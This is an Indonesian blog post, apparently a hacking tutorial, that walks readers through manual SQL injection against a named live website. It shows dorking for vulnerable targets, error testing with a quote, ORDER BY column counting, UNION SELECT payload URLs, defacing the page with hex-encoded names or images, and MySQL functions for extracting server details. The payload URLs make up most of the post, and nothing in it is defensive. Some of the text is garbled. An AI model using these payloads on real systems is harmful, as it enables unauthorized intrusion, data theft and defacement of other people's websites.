Populer Post

Loading...

kamu harus tau tentang Sqli inject (dios)

kamu harus tau tentang Sqli inject (dios)
Posted by Yudha Wahyu Pratama
Dios

Assallamualaikum Wr.Wb
dikesempatan kali ini saya akan membahas cara sqli manual (Dios) apasih fungsi dios ? berguna untuk
mencari database di web.
untuk melakukan sqli inject manual siapkan dulu bahan-bahan nya :

~ Dork
~ Termux

jika udah disiapkan semua bahan nya kita langsung eksekusi.
kalau ada yang bertanya apa gunannya termux disini ? gunannya untuk buat kalian yang malas cari web yang vuln dengan install ko-dork.
pertama kita ngedork dulu di google atau buat kalian yang malas download termux dan kita install tool ko-dork
jika sudah punya target lewati step diatas jika belom lakukan step diatas
disini saya sudah punya live target
http://www.coda.cc/product/product.php?id=4
untuk kalian yang tidak menggunakan ko-dork atau kalian yang udah menggunakan ko-dork tapi masih bimbang vuln ngak nya web tersebut bisa melakukan hal ini
tambah (') dibelakang link web ya
http://www.coda.cc/product/product.php?id=4(')
note : tanpa tanda buka kurung ()
jika ada tulisan error berarti vuln.
oke kita lanjut untuk ke order+by
http://www.coda.cc/product/product.php?id=4+order+by+1--+
angka yang berwarna merah bisa diganti sampai kita menemukan tulisan error di web

di web target saya
menemukan error di nomer 14
http://www.coda.cc/product/product.php?id=4+order+by+14--+
Jika udah melakukan order kita lakukan onion select
http://www.coda.cc/product/product.php?id=-4+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13-++
kenapa saya ketik sampai nomer  karna error saya berada di nomer  begitu seterus nya
nanti akan menemukan nomer ajaib
seperti gambar dibawah ini


nomer ajaib ini berguna untuk memasukan inject,selain kita mencari database kita bisa buat mainan sqli inject dengan mengeprint gambar dan nama kalian apapun sesuai imajinasi kalian

disini nomer ajaib saya 2,4 dan 5

http://www.coda.cc/product/product.php?id=-4+onion+select+1,concat(link gambar" />Injek by Nama kalian),3,4,5,6,7,8,9,10,11,12,13--+

kode * ganti aja =
dan kalimat yg berwarna merah ganti sesuai selera anda

Nama kalian harus convet ke hex Disini

contoh

6b696c6c657220636c6f776e
Jangan lupa ditambah 0x

Menjadi

http://www.coda.cc/product/product.php?id=-4+union+select+1,2,concat(0x6b696c6c657220636c6f776e),4,5,6,7,8,9,10,11,12,13--+
Hasilnya akan seperti ini

code di bawah ini bisa ditambahkan sesuai kebutuhan.
Function Output
@@version =Menampilkan Versi database
user() = Menampilkan Nama User database
@@hostname Menampilkan Hostname
@@tmpdir Menampilkan Direktori temp
@@datadir Menampilkan Direktori data
@@basedir Menampilkan Direktori base
database() Menampilkan Nama Database
schema() Menampilkan Database yang dipakai
session_user() Menampilkan Session User
UUID() Menampilkan System UUID Key
current_user() Menampilkan User Sekarang
system_user() Menampilkan System User Sekarang
@@GLOBAL.have_symlink Mengecek symlink aktif atau tidak
@@GLOBAL.have_ssl Mengecek apakah ada SSL atau tidak

sekian sampai jumpa lagi di artikel berikunya




0 Response to "kamu harus tau tentang Sqli inject (dios)"

Post a Comment

Iklan Atas Artikel

Iklan Tengah Artikel 1

Iklan Tengah Artikel 2

Iklan Bawah Artikel

DMCA.com Protection Status